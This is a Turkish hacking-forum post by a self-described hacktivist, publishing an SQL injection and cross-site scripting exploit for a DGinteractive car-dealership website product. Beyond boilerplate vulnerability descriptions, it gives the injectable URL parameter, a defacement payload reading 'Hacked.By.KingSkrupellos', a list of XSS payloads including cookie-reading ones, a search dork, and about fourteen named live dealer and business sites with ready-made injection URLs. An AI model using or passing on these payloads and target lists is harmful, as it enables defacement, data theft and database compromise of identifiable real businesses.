Konuyu Oyla:
  • Toplam: 1 Oy - Ortalama: 5
  • 1
  • 2
  • 3
  • 4
  • 5
   
Konu: DGinteractive Internet Automobile XSS SQL Injection
KingSkrupellos
*
avatar
Hacktivist
Durum: Çevrimdışı
Seviye Puanı: 56
Yaşam Puanı: 1,389 / 1,389
Deneyim: 59 / 100
Rep Sayısı: 2870
Mesaj Sayısı: 6555
Üyelik Tarihi: 21.08.2013
     
Yorum: #1
DGinteractive Internet Automobile XSS SQL Injection
21.05.2020 04:02
####################################################################

# Exploit Title : DGinteractive Internet Automobile XSS SQL Injection
# Author [ Discovered By ] : KingSkrupellos
# Team : Cyberizm Digital Security Army
# Date : 21 May 2020
# Vendor Homepage : dginteractive.fr
+ dginteractive.fr/creation-de-sites-internet/creation-site-internet-mandataire-automobile-concession-garage
# Tested On : Windows and Linux
# Category : WebApps
# Exploit Risk : Medium
# Vulnerability Type : CWE-89 [ Improper Neutralization of
Special Elements used in an SQL Command ('SQL Injection') ]
CWE-79 [ Improper Neutralization of Input During Web Page
Generation ('Cross-site Scripting') ]
CAPEC-66 [ SQL Injection ]
CAPEC-63 [ Cross-Site Scripting (XSS) ]
# Google Dorks : DGinteractive : création de site internet automobile
# PacketStormSecurity : packetstormsecurity.com/files/authors/13968
# CXSecurity : cxsecurity.com/author/KingSkrupellos/1/
# Exploit4Arab : exploit4arab.org/author/KingSkrupellos
# Zone-H : zone-h.org/archive/notifier=KingSkrupellos
zone-h.org/archive/notifier=CyBeRiZM
# Mirror-H : mirror-h.org/search/hacker/948/
mirror-h.org/search/hacker/94/
mirror-h.org/search/hacker/1826/
# Defacer.ID : defacer.id/archive/attacker/KingSkrupellos
defacer.id/archive/team/Cyberizm-Org
# Inj3ctor : 1nj3ctor.com/attacker/43/ ~ 1nj3ctor.com/attacker/59/
# Aljyyosh : aljyyosh.org/hacker.php?id=KingSkrupellos
aljyyosh.org/hacker.php?id=Cyberizm.Org
aljyyosh.org/hacker.php?id=Cyberizm
# Zone-D : zone-d.org/attacker/id/69
# Pastebin : pastebin.com/u/KingSkrupellos
# Cyberizm.Org : cyberizm.org/forum-exploits-vulnerabilities

###################################################################

# Impact :
***********
DGinteractive is prone to an SQL-injection vulnerability because it fails to sufficiently
sanitize user-supplied data before using it in an SQL query. Exploiting this issue could allow
an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities
in the underlying database. A remote attacker can send a specially crafted request to the vulnerable
application and execute arbitrary SQL commands in application`s database.
Further exploitation of this vulnerability may result in unauthorized data manipulation.
An attacker can exploit this issue using a browser or with any SQL Injector Tool.

Reflected XSS (or Non-Persistent) :
***************************************
The server reads data directly from the HTTP request and reflects it back in the HTTP response.
Reflected XSS exploits occur when an attacker causes a victim to supply dangerous content
to a vulnerable web application, which is then reflected back to the victim and executed by the
web browser. The most common mechanism for delivering malicious content is to include
it as a parameter in a URL that is posted publicly or e-mailed directly to the victim.
URLs constructed in this manner constitute the core of many phishing schemes, whereby
an attacker convinces a victim to visit a URL that refers to a vulnerable site. After the site reflects
the attacker's content back to the victim,the content is executed by the victim's browser.

CWE-89: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')
********************************************************************************​***
The software constructs all or part of an SQL command using externally-influenced input from an
upstream component, but it does not neutralize or incorrectly neutralizes special elements that could
modify the intended SQL command when it is sent to a downstream component.

CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')
********************************************************************************​
The software does not neutralize or incorrectly neutralizes user-controllable input before
it is placed in output that is used as a web page that is served to other users.

Cross-site scripting (XSS) vulnerabilities occur when:

1. Untrusted data enters a web application, typically from a web request.

2. The web application dynamically generates a web page that contains this untrusted data.

3. During page generation, the application does not prevent the data from containing content
that is executable by a web browser, such as JavaScript, HTML tags, HTML attributes,
mouse events, Flash, ActiveX, etc.

4. A victim visits the generated web page through a web browser, which contains
malicious script that was injected using the untrusted data.

5. Since the script comes from a web page that was sent by the web server, the victim's
web browser executes the malicious script in the context of the web server's domain.

6. This effectively violates the intention of the web browser's same-origin policy, which states
that scripts in one domain should not be able to access resources or run code in a different domain.

CAPEC-66: SQL Injection
************************
This attack exploits target software that constructs SQL statements based on user input.
An attacker crafts input strings so that when the target software constructs SQL statements
based on the input, the resulting SQL statement performs actions other than those the application intended.
SQL Injection results from failure of the application to appropriately validate input.
When specially crafted user-controlled input consisting of SQL syntax is used without proper validation
as part of SQL queries, it is possible to glean information from the database in ways not envisaged
during application design. Depending upon the database and the design of the application,
it may also be possible to leverage injection to have the database execute system-related commands
of the attackers' choice. SQL Injection enables an attacker to talk directly to the database,
thus bypassing the application completely. Successful injection can cause information disclosure
as well as ability to add or modify data in the database.

CAPEC-63: Cross-Site Scripting (XSS)
************************************
An adversary embeds malicious scripts in content that will be served to web browsers.
The goal of the attack is for the target software, the client-side browser, to execute the script
with the users' privilege level. An attack of this type exploits a programs' vulnerabilities that are
brought on by allowing remote hosts to execute code and scripts. Web browsers, for example,
have some simple security controls in place, but if a remote attacker is allowed to execute
scripts (through injecting them in to user-generated content like bulletin boards) then these
controls may be bypassed. Further, these attacks are very difficult for an end user to detect.

###################################################################

# SQL Vulnerable Parameter :
**************************
?page=resultat&formu_marque=[ID-NUMBER]&formu_categorie=[ID-NUMBER]&formu_modele=[ID-NUMBER]&formu_energie=[ID-NUMBER]&tri=prix%20desc&limite=[ID-NUMBER]&pagenb=[ID-NUMBER]&start=[SQL Injection]

# SQL Injection Exploit :
**********************
/index.php?page=resultat&formu_marque=[ID-NUMBER]&formu_categorie=[ID-NUMBER]&formu_modele=[ID-NUMBER]&formu_energie=[ID-NUMBER]&tri=prix%20desc&limite=[ID-NUMBER]&pagenb=[ID-NUMBER]&start=[SQL Injection]

# Cross Site Scripting XSS Exploit :
********************************
/index.php?page=resultat&formu_marque=7&formu_categorie=3&formu_modele=0
&formu_energie=0&tri=prix%20desc&limite=16&pagenb=1&start=1%27%3Cmarquee
%3E%3Cfont%20color=lime%20size=32%3EHacked.By.KingSkrupellos.%3C/font%3E%3C/marquee%3E

1%27<marquee><font%20color=lime%20size=32>Hacked.By.KingSkrupellos.</font></marquee>

"><script>alert(String.fromCharCode(88,83,83))</script>

">--></SCRIPT>KingSkrupellos<SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>%20HTTP/1.1

<ScRipT>alert("XSS");</ScRipT>

"><script>alert(String.fromCharCode(66, 108, 65, 99, 75, 73, 99, 101))</script>

“><ScRiPt>alert(document.cookie)</script>

data:text/html,<script>alert(0)</script>

<script src="data:;base64,YWxlcnQoZG9jdW1lbnQuZG9tYWluKQ=="></script>

';alert(String.fromCharCode(88,83,83))//';alert(String. fromCharCode(88,83,83))//";alert(String.fromCharCode (88,83,83))//";alert(String.fromCharCode(88,83,83))//-- ></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83)) </SCRIPT>

<svg onload=alert(1)//

<object data='data:text/html;;;;;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=='></object>

"`'><script>\xE2\x80\x84jalert(1)</script>

###################################################################

# Example Vulnerable Sites and Vulnerable IP Addresses :
***************************************************
Reverse IP results for (213.186.33.2)
There are 60,082 domains hosted on this server.

Reverse IP results for (164.132.235.17)
There are 89,323 domains hosted on this server.

Reverse IP results for (213.186.33.19)
There are 145,637 domains hosted on this server.

Reverse IP results for (87.98.154.146)
There are 84,065 domains hosted on this server.

Reverse IP results for (213.186.33.107)
There are 1,380 domains hosted on this server.

Reverse IP results for (213.186.33.16)
There are 66,886 domains hosted on this server.

Reverse IP results for (217.160.0.58)
There are 14,732 domains hosted on this server.

Reverse IP results for (213.186.33.4)
There are 114,183 domains hosted on this server.

Reverse IP results for (164.132.235.17)
There are 89,323 domains hosted on this server.

Reverse IP results for (217.160.0.116)
There are 14,867 domains hosted on this server.

Reverse IP results for (213.186.33.40)
There are 95,065 domains hosted on this server.

Reverse IP results for (213.186.33.3)
There are 103,623 domains hosted on this server.

Reverse IP results for (81.88.48.95)
There are 11,443 domains hosted on this server.

Reverse IP results for (213.186.33.16)
There are 66,886 domains hosted on this server.

[+] milleniumauto.fr/index.php?page=resultat&formu_marque=7&formu_categorie=3&formu_modele=0&formu_energie=0&tri=prix%20desc&limite=16&pagenb=1&start=1%27

[+] ie-auto.fr/index.php?page=resultat&formu_marque=7&formu_categorie=3&formu_modele=0&formu_energie=0&tri=prix%20desc&limite=16&pagenb=1&start=1%27

[+] adourimport.com/index.php?page=resultat&formu_marque=7&formu_categorie=3&formu_modele=0&formu_energie=0&tri=prix%20desc&limite=16&pagenb=1&start=1%27

[+] autoimportjls.com/index.php?page=resultat&formu_marque=7&formu_categorie=3&formu_modele=0&formu_energie=0&tri=prix%20desc&limite=16&pagenb=1&start=1%27

[+] cuisinier-automobiles.com/index.php?page=resultat&formu_marque=7&formu_categorie=3&formu_modele=0&formu_energie=0&tri=prix%20desc&limite=16&pagenb=1&start=1%27

[+] lmda-automobiles.fr//index.php?page=resultat&formu_marque=7&formu_categorie=3&formu_modele=0&formu_energie=0&tri=prix%20desc&limite=16&pagenb=1&start=1%27

[+] auto-direct-import.com/index.php?page=resultat&formu_marque=7&formu_categorie=3&formu_modele=0&formu_energie=0&tri=prix%20desc&limite=16&pagenb=1&start=1%27

[+] neuve-occaz-automobiles.com/index.php?page=resultat&formu_marque=7&formu_categorie=3&formu_modele=0&formu_energie=0&tri=prix%20desc&limite=16&pagenb=1&start=1%27

[+] milleniumautogalerie.fr/index.php?page=resultat&formu_marque=7&formu_categorie=3&formu_modele=0&formu_energie=0&tri=prix%20desc&limite=16&pagenb=1&start=1%27

[+] garagefillon.fr/index.php?page=resultat&formu_marque=7&formu_categorie=3&formu_modele=0&formu_energie=0&tri=prix%20desc&limite=16&pagenb=1&start=1%27

[+] autoimport72.fr/index.php?page=resultat&formu_marque=7&formu_categorie=3&formu_modele=0&formu_energie=0&tri=prix%20desc&limite=16&pagenb=1&start=1%27

[+] priscar.com/index.php?page=resultat&formu_marque=7&formu_categorie=3&formu_modele=0&formu_energie=0&tri=prix%20desc&limite=16&pagenb=1&start=1%27

[+] camping-saint-meen.fr/index.php?page=resultat&formu_marque=7&formu_categorie=3&formu_modele=0&formu_energie=0&tri=prix%20desc&limite=16&pagenb=1&start=1%27

[+] cuisinier-automobiles.com/index.php?page=resultat&formu_marque=7&formu_categorie=3&formu_modele=0&formu_energie=0&tri=prix%20desc&limite=16&pagenb=1&start=1%27

###################################################################

# Example SQL Database Error :
****************************
Erreur recup liste produit You have an error in your SQL syntax; check the manual that corresponds
to your MySQL server version for the right syntax to use near '',16' at line 1 :: SELECT * FROM
dg_produit WHERE publie=1 AND vendu=0 GROUP BY id_produit ORDER BY titre ASC LIMIT 1',16
Fatal error: Uncaught exception 'PDOException' with message 'SQLSTATE[42000]: Syntax error or
access violation: 1064 You have an error in your SQL syntax; check the manual that corresponds
to your MySQL server version for the right syntax to use near '',16' at line 1' in /home/cuisiniezb
/www/inc.resultat.php:11 Stack trace: #0 /home/cuisiniezb/www/inc.resultat.php(11): PDO->
query('SELECT * FROM d...') #1 /home/cuisiniezb/www/index.php(538): include('/home/cuisiniez...')
#2 {main} thrown in /home/cuisiniezb/www/inc.resultat.php on line 11

###################################################################

# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team

###################################################################

# Cyberizm Digital Security Technological Turkish Moslem Army #
# İnsanda bir organ vardır. Eğer o sağlıklı ise bütün vücut sağlıklı olur;
eğer o bozulursa bütün vücut bozulur. Dikkat edin! O, kalptir.
[ Hz.Muhammed S.A.V ] #


Alinti



1 Ziyaretçi